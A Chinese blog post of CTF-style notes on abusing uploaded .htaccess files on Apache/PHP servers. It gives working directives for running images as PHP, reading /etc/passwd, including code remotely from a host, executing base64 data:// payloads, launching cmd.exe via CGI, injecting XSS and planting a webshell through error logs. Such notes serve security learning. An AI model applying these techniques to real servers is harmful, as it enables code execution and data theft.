.htaccess利用方式

最新推荐文章于 2024-05-01 06:22:28 发布
最新推荐文章于 2024-05-01 06:22:28 发布
阅读量1.6k 收藏 16
点赞数 3
分类专栏: 安全学习 文章标签: php web安全 .htaccess ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/116541325
版权

.htaccess利用方式

文件解析

经常出现在文件上传的黑名单没有限制 .htaceess 后缀,通过上传 .htaccess 文件,再上传图片,使图片的 php 恶意代码得以被解析执行
.htaccess 文件内容有如下两种

(1)SetHandler 指令

# 将images.png 当做 PHP 执行
<FilesMatch  "images.png">
SetHandler  application/x-httpd-php
</FilesMatch>

在这里插入图片描述

(2)AddType

# 将 .jpg(.xxx) 当做 PHP 文件解析
AddType application/x-httpd-php .jpg(.xxx)

文件包含

本地文件包含
通过 php_value 来设置 auto_prepend_file或者 auto_append_file 配置选项包含一些敏感文件,同时在本目录或子目录中需要有可解析的 php 文件来触发
.htaccess 分别通过这两个配置选项来包含 /etc/passwd,并访问同目录下的 index.php文件

auto_prepend_file

php_value auto_prepend_file /etc/passwd

在这里插入图片描述

auto_append_file

php_value auto_append_file /etc/passwd

在这里插入图片描述

远程文件包含
PHP 的 all_url_include 配置选项这个选项默认是关闭的,如果开启的话就可以远程包含。因为 all_url_include 的配置范围为 PHP_INI_SYSTEM,所以无法利用 php_flag 在 .htaccess 中开启

php_value auto_append_file http://10.87.9.156/phpinfo.txt

在这里插入图片描述

源码泄露

利用 php_flag 将 engine 设置为 0,在本目录和子目录中关闭 php 解析,造成源码泄露

php_flag engine 0

在这里插入图片描述

代码执行

(1)利用伪协议
all_url_fopen、all_url_include 为 On
(2)解析.htaccess

1)
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B

在这里插入图片描述

2.1)
php_value auto_append_file .htaccess
#<?php phpinfo();2.2)
这种适合同目录或子目录没有 php 文件。
需要先设置允许可访问 .htaccess 文件

Files ~ "^.ht">
 Require all granted
 Order allow,deny
 Allow from all
</Files>.htaccess指定当做 php文件处理

SetHandler application/x-httpd-php
# <?php phpinfo(); ?>

在这里插入图片描述
在这里插入图片描述

命令执行

CGI启动

cgi_module 需要加载,即 apache 配置文件中有

LoadModule cgi_module modules/mod_cgi.so
.htaccess内容

Options ExecCGI #允许CGI执行
AddHandler cgi-script .xx #将xx后缀名的文件,当做CGI程序进行解析
ce.xx

#!C:/Windows/System32/cmd.exe /k start calc.exe
6

在这里插入图片描述
参考例题

FastCGI启动

mod_fcgid.so需要被加载。即 apache 配置文件中有

LoadModule fcgid_module modules/mod_fcgid.so
.htaccess

Options +ExecCGI
AddHandler fcgid-script .xx
FcgidWrapper "C:/Windows/System32/cmd.exe /k start calc.exe" .xx

ce.xx 内容随意

在这里插入图片描述

XSS

highlight_file

.htaccess
php_value highlight.comment '"><script>alert(1);</script>'

index.php
<?php
highlight_file(__FILE__);
// comment

其中的 highlight.comment 也可以换成如下其他选项

在这里插入图片描述

错误消息链接

index.php :
<?php
include('foo');#foo报错

.htaccess
php_flag display_errors 1
php_flag html_errors 1
php_value docref_root "'><script>alert(1);</script>"

在这里插入图片描述

自定义错误文件

error.php
<?php include('shell');#报错页面

.htaccess
php_value error_log /tmp/www/html/shell.php 
php_value include_path "<?php phpinfo(); __halt_compiler();"

访问 error.php,会报错并记录在 shell.php 文件中

在这里插入图片描述

因为会经过 html 编码,所以需要 UTF-7 来绕过。

.htaccess

# 第一次
php_value error_log /tmp/shell #定义错误路径
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
php_value include_path "+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs"

# 第二次
php_value include_path "/tmp" #将include()的默认路径改变
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"

参考例题

H3rmesk1t
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
git 大文件删除及管理
cnting
07-17 3460
项目里把数据库和mapping.txt等文件都push到仓库里了,导致仓库变的很大,都800多M了,gitee提示如果超1G就限制push次数了。 仓库瘦身一般有两种方式,一种是使用git官方的git filter-branch命令,一种是使用三方库BFG,使用BFG简单一点,而且会快很多,这里说下步骤 主要是参考 使用BFG清除git仓库中的隐私文件或大文件 1. 下载jar包 到官网下载:官网,为了方便,将bfg-1.13.0.jar重命名为bfg.jar 2. clone自己的项目,使用–mirror
.htaccess学习
m0_61448651的博客
07-20 959
.htaccess学习
文件上传漏洞的原理和利用(详细)
永不落的梦想
07-05 3122
本文包含文件上传漏洞的原理、利用和防御,绕过文件上传限制的各种姿势可以有效地利用文件上传漏洞,非常全面详细
2024年最全【Web安全】htaccess攻击_
最新发布
2401_84281638的博客
05-01 433
参考于[CTF].htaccess的使用技巧总结,由于是偏笔记类的博客,所以不给出太多的案例。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。 观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。 当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的
关于.htaccess攻击
good good study
03-07 4424
目录 .htaccess在文件上传中的利用 1.1. 把png文件当做php文件解析 1.2文件名中包含. php关键字并解析 1.3匹配文件名,即有文件名和配置中的文件名是一样的就会当做文件执行 .htaccess(分布式配置文件)是许多Web服务器根据目录应用设置的有用文件,允许在运行时覆盖Apache服务器的默认配置。使用.htaccess,我们可以在运 行时轻松启用或禁用任何功能。 .htaccess在文件上传中的利用 将上传的文件命名为.htaccess,内容可...
文件上传之.htaccess文件利用
注定风是不羁旅人
11-21 1833
关于.htaccess文件又不懂的同学可以去点击以下链接去了解 点击这里 当我们遇到目标限制了很多文件后缀名的情况时,我们可以考虑使用.htaccess进行绕过 首先我们先上传一个.htaccess文件,文件内容如下 SetHandler application/x-httpd-php 这段内容的作用是使所有的文件都会被解析为php文件 上传成功之后我们准备上传木马 木马后缀名只要不是目标...
利用.htaccess的Rewrite规则实现Discuz论坛的伪静态链接
09-11
是一个流行的开源论坛系统,为了更好地进行SEO,可以利用`.htaccess`文件中的Rewrite规则来实现伪静态链接。`.htaccess`文件是Apache服务器配置中的一个分布式配置文件,允许在每个目录级别自定义服务器行为。 在...
利用.htaccess实现禁止某个IP访问网站的方法
09-22
主要给大家介绍了关于利用.htaccess实现禁止某个IP访问网站的方法,通过设置禁止某个IP段的访问,增加该虚拟主机的安全性,文中通过图文及示例代码介绍的非常详细,需要的朋友们可以参考借鉴,下面来一起看看吧。
Apache 的. htaccess 利用技巧1
08-03
介绍,主要讲解几种常利用的指令。SetHandler 可以强制所有匹配的文件被一个指定的处理器处理用法:示例 1:此时当前目录及其子目录下所有文件都会被当做 p
修改.htaccess实现301域名重定向示例分享
09-15
主要介绍了修改.htaccess实现301域名重定向示例,需要的朋友可以参考下
php后门木马常用命令分析与防范
主题模板站的博客
01-22 803
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
php后门木马常用的函数
qq_42572322的博客
08-15 4404
php后门木马常用的函数大致上可分为四种类型:   1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open   2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13   3. 文件...
PHP文件上传漏洞
BrosyveryOK的博客
11-28 2243
上礼拜一直在搞期中测试和unctf,没啥时间整理,这礼拜继续整理!
.htaccess 禁止php,htaccess如何禁止目录执行php方法
weixin_36158843的博客
03-18 625
htaccess禁止目录执行php的方法:首先在要禁止的目录下新建一个htaccess文件;然后输入内容为“php_flag engine off”并保存即可。推荐:《PHP视频教程》.htaccess禁止目录执行php方法系统:centos 5.9环境:lampapache禁止后缀的方法:这里就只演示下怎么禁止php执行,其他的稍微简单改了就好.在你要禁止的目录下新建个.htaccess,内容为...
php append,php.ini配置php auto_prepend_file和auto_append_file参数
weixin_32518317的博客
03-12 761
php.ini 中有两个配置参数,auto_prepend_file 和 auto_append_file,其作用相当于php代码 require 或 include,使用这两个指令包含的文件如果该文件不存在,将产生一个警告。auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件auto_append_file 表示在php代码执行完毕后加载指定的php文件在某...
iwebsec靶场文件上传漏洞-.htaccess文件上传
qq_56041380的博客
03-28 1092
.htaccess文件上传是利用.htaccess文件对Web服务器进行配置的功能,实现将扩展名为.jpg、.png等的文件当做PHP文件解析的过程
.htaccess利用方法和技巧
snowlyzz的博客
08-10 1924
关于htaccess 的妙用
文件上传漏洞 绕过分析
m0_64118193的博客
06-18 1477
目录1.一句话木马常见函数1.前端js绕过文件漏洞绕过2.文件类型绕过(MIME)3.黑名单绕过-同类型绕过 4. 黑名单绕过-.htaccess绕过5.黑名单绕过-点空格点绕过6.黑名单绕过-大小写文件绕过7.黑名单绕过-空格绕过8.黑名单绕过-点绕过9.黑名单绕过-win10文件流特征绕过10.黑名单绕过-双写绕过*蚁剑连接,获取权限文件上传靶场链接下载 Search · upload · GitHub在很多渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提取权限,不
.htaccess详解及.htaccess参数说明
热门推荐
weilee2009的专栏
10-21 5万+
.htaccess文件(或者”分布式配置文件”)提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值